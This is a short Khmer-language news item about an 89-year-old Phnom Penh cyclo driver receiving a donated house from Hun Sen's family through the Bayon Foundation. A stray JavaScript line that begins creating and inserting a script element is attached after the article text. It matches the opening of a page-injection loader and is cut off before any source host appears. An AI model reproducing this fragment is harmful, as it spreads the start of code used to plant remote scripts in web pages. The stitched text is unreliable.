បំណងប្រាថ្នាលោកតាធាក់សុីក្លូ អាយុ៨៩ឆ្នាំបានសម្រេចហើយ!
ភ្នំពេញ៖ នៅព្រឹកថ្ងៃទី១១ ខែសីហា នេះ លោកតា ពុត សឿន ដែលបងប្អូនប្រជាពលរដ្ឋធ្លាប់បានតាមនដានជីវិតជា “ជនចាស់ជរាធាក់ស៊ីក្លូអាយុ៨៩ឆ្នាំ” នៅទីក្រុងភ្នំពេញ ដែលត្រូវបាន សម្តេចតេជោ ហ៊ុន សែន បំពេញបំណងប្រាថ្នារបស់លោកតា គឺថ្ងៃនេះបានទទួលអំណោយផ្ទះដ៏ស្រស់ស្អាតហើយ ដែលបានប្រគល់ជូនដោយ លោកជំទាវ ហ៊ុន ម៉ាណា ប្រធានមូលនិធិបាយ័ន និងជាតំណាងដ៏ខ្ពង់ខ្ពស់ សម្តេចតេជោ។ ផ្ទះនេះប្រសិទ្ឋនាមថា “ផ្ទះទេវតា” ដែលជាអំណោយដ៏ថ្លៃថ្លាររបស់ សម្តេចតេជោ ហ៊ុន សែន និង សម្តេចកិត្តិព្រឹទ្ឋបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុន សែន។
សូមជូនពរ លោកតា ពុត សឿន រស់នៅសុខសប្បាយចាប់ពីពេលនេះតទៅ និងសូមអោយវប្បធម៌នៃការចែករំលែក និងចេះជួយគ្នាកើតមានដល់ប្រជាពលរដ្ឋនៅទូទាំងប្រទេស៕
var d=document;var s=d.createElement(‘script’);